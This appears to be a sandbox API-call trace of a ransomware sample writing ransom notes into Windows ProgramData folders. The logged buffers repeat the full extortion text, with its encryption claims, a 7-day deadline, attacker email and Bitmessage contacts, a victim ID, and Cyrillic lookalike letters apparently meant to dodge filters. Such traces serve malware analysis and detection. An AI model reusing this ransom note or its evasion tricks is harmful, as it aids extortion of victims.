\\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0259.360] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0259.361] CloseHandle (hObject=0x294) returned 1 [0259.361] GetFileAttributesW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\oracle\\java\\javapath\\#readme_eman#.rtf")) returned 0x20 [0259.361] GetFileAttributesW (lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\oracle\\java\\javapath_target_5923062\\#readme_eman#.rtf")) returned 0x20 [0259.361] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\#readme_eman#.rtf")) returned 0xffffffff [0259.361] GetLastError () returned 0x2 [0259.361] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0260.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0260.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0260.935] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4d618, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 